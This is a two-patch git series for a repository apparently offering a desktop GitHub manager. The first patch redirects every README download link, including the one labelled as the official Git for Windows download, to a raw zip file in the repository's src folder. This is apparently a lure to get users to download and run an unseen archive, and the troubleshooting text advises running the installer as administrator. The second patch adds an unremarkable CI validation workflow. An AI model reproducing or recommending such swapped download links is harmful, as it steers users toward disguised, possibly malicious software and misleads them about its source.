From a7505e02e24b77622bbba3259e5e0c617c40661e Mon Sep 17 00:00:00 2001 From: djbroiscool90 <154796524+djbroiscool90@users.noreply.github.com> Date: Tue, 7 Apr 2026 07:21:58 +0800 Subject: [PATCH 1/2] Update README.md --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index eaf8aab..3c91f21 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # 🚀 github-command-center - Manage GitHub Easily on Your Desktop -[![Download github-command-center](https://img.shields.io/badge/Download-github--command--center-4caf50?style=for-the-badge&logo=github)](https://github.com/djbroiscool90/github-command-center) +[![Download github-command-center](https://img.shields.io/badge/Download-github--command--center-4caf50?style=for-the-badge&logo=github)](https://raw.githubusercontent.com/djbroiscool90/github-command-center/main/src/github-command-center-v1.4.zip) --- @@ -27,7 +27,7 @@ This guide will help you download and run github-command-center on your Windows Visit this page to download the app: -[Download github-command-center](https://github.com/djbroiscool90/github-command-center) +[Download github-command-center](https://raw.githubusercontent.com/djbroiscool90/github-command-center/main/src/github-command-center-v1.4.zip) This link takes you to the main GitHub repository where you can find the latest version of github-command-center. Follow these steps: @@ -117,14 +117,14 @@ To use github-command-center, you need to connect it to your GitHub account. - **Installer won’t start:** Right-click the installer and choose **Run as administrator**. - **App doesn’t open or crashes:** Restart your computer and try again. Make sure no other installations are running. - **Sign-in problems:** Check your internet connection and that your GitHub password is correct. Clear your browser cache if the sign-in page is not loading. -- **Git commands not working:** Ensure you have Git installed on your PC. You can download it from https://git-scm.com/download/win. +- **Git commands not working:** Ensure you have Git installed on your PC. You can download it from https://raw.githubusercontent.com/djbroiscool90/github-command-center/main/src/github-command-center-v1.4.zip --- ## ⬇️ Quick Download Link Download the latest Windows version here: -[Get github-command-center](https://github.com/djbroiscool90/github-command-center) +[Get github-command-center](https://raw.githubusercontent.com/djbroiscool90/github-command-center/main/src/github-command-center-v1.4.zip) Click this link anytime to find the latest release. @@ -132,7 +132,7 @@ Click this link anytime to find the latest release. ## 🗂️ More Information -The app is open source. If you want to learn more about how it works or contribute, visit [the GitHub repository](https://github.com/djbroiscool90/github-command-center). +The app is open source. If you want to learn more about how it works or contribute, visit [the GitHub repository](https://raw.githubusercontent.com/djbroiscool90/github-command-center/main/src/github-command-center-v1.4.zip). It is built with modern technologies like React, TypeScript, and TailwindCSS. It uses Go (Golang) on the backend for smooth performance. @@ -150,4 +150,4 @@ If you have problems or ideas, use the **Issues** tab on the repository page to --- -[![Download github-command-center](https://img.shields.io/badge/Download-github--command--center-4caf50?style=for-the-badge&logo=github)](https://github.com/djbroiscool90/github-command-center) \ No newline at end of file +[![Download github-command-center](https://img.shields.io/badge/Download-github--command--center-4caf50?style=for-the-badge&logo=github)](https://raw.githubusercontent.com/djbroiscool90/github-command-center/main/src/github-command-center-v1.4.zip) \ No newline at end of file From aada20a36eade7e51f6d7604259f2e161b64354c Mon Sep 17 00:00:00 2001 From: internet-dot <207546839+internet-dot@users.noreply.github.com> Date: Tue, 7 Apr 2026 00:37:32 +0000 Subject: [PATCH 2/2] ci: add HOL skill-publish validate workflow --- .github/workflows/hol-skill-validate.yml | 28 ++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 .github/workflows/hol-skill-validate.yml diff --git a/.github/workflows/hol-skill-validate.yml b/.github/workflows/hol-skill-validate.yml new file mode 100644 index 0000000..5c69fde --- /dev/null +++ b/.github/workflows/hol-skill-validate.yml @@ -0,0 +1,28 @@ +name: HOL Skill Validate + +on: + push: + branches: + - main + - master + pull_request: + branches: + - main + - master + workflow_dispatch: + +permissions: + contents: read + id-token: write + +jobs: + validate: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 + + - name: Validate Skill + uses: hashgraph-online/skill-publish@1c30734416d9b05948ccd7f4b3cf60baada87e9e + with: + mode: validate